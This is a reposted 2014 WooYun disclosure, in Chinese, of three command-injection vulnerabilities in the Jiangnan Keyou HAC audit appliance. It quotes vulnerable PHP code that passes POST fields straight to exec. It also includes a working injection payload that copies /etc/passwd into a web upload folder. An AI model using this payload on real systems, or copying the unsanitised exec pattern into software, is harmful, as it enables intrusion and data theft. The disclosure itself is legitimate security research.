[公开漏洞]江南科友HAC运维审计系统存在三处命令注入漏洞(一处自带回显)

来源:WooYun 浏览:471次 时间:2014-06-12
做网站找雨过天晴工作室
江南科友HAC运维审计系统存在三处命令注入漏洞(一处自带回显) 相关厂商: cncert国家互联网应急中心 漏洞作者:wefgod 提交时间:2014-03-05 12:50 公开时间:2014-06-03 12:51 漏洞类型:命令执行 危害等级:高 自评Rank:20 漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理 漏洞来源:http://www.wooyun.org Tags标签: php源码审核 命令执行 php 命令注入 漏洞详情 披露状态:

2014-03-05:细节已通知厂商并且等待厂商处理中
2014-03-10:厂商已经确认,细节仅向厂商公开
2014-03-13:细节向第三方安全合作伙伴开放
2014-03-20:细节向核心白帽子及相关领域专家公开
2014-03-30:细节向普通白帽子公开
2014-04-19:细节向实习白帽子公开
2014-06-03:细节向公众公开

简要描述:

三处可执行漏洞的地方。版本和上次的版本是一样的
上一发:http://www.wooyun.org/bugs/wooyun-2014-051345

详细说明:

这次也还是在内网测试的。

第一处来一个执行可回显的(写shell请自行研究):

system\sys_ping.php

if(!empty($_POST['IP_addr']))
{
$cmd = "ping -c 4 -s 32 ".$_POST['IP_addr']; //问题参数IP_addr
exec($cmd, $list);
flush();
for($i=0;$i < count($list);$i++)
{
$row[$i]['list_msg'] = $list[$i];
}
$st->assign('pingip_value',$_POST['IP_addr']);
$st->assign('msg',$row);
}
$st->assign('nav_title', '系统管理>>网络配置>>Ping功能');
$st->assign('h1','sys_ping');
$st->output();



image006.png



image008.png





漏洞证明:

第二处:

system\tcpdump.php

if(!empty($_POST['eth0']))
{
$filename0="/tmp/".$_POST['eth0']."_".$data['0'].".tcp"; //eth0,其实下面还有其它参数的,雷同
//echo $filename0;
exec(MYSUDO."/usr/sbin/tcpdump -i eth0 -c $package -w $filename0 > /tmp/null &");
}





Post:

https://1.1.1.1/system/tcpdump.php

op_type=downloadcatch&eth0=1 | cp /etc/passwd /usr/local/apache2/htdocs/project/www/upload/123.txt | 1&dump=

image001.png



image003.png



image004.png





最后这里不具体测试了。给出代码例子

system\sys_basic.php

function CliIP($URL,$stat,$ipstr)
{
exec(MYSUDO."chown -R daemon:daemon".$URL);
if(file_exists($URL)){
exec(MYSUDO."sh ".$URL." ".$stat." ".$ipstr,$output,$er);
return $output[count($output)-1];
}
}


//MAC地址绑定
if(!empty($_POST['flag']) && $_GET['show_flag'] > 0)
{
switch($_POST['flag']) {
case '1':
$AA=CliIP('/usr/local/keyou/Bin/bindmac.sh','add',$_POST['IP']." ".$_POST['MAC']); //调用的这有问题。
if($AA)
$bindmac_flag = $AA;
else
$bindmac_flag = -1;
break;
case '2':
//echo $_POST['MACstr'];
$AA=CliIP('/usr/local/keyou/Bin/bindmac.sh','del',$_POST['MACstr']);
if($AA)
$bindmac_flag = $AA;
else
$bindmac_flag = -2;
break;
}
}

修复方案:

版权声明:转载请注明来源 wefgod@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-03-10 21:05

厂商回复:

CNVD确认所述漏洞机理,未在实例上进行复现,已经由CNVD通过直接联系渠道转报给江南科友公司,由其后续处置。

最新状态:

暂无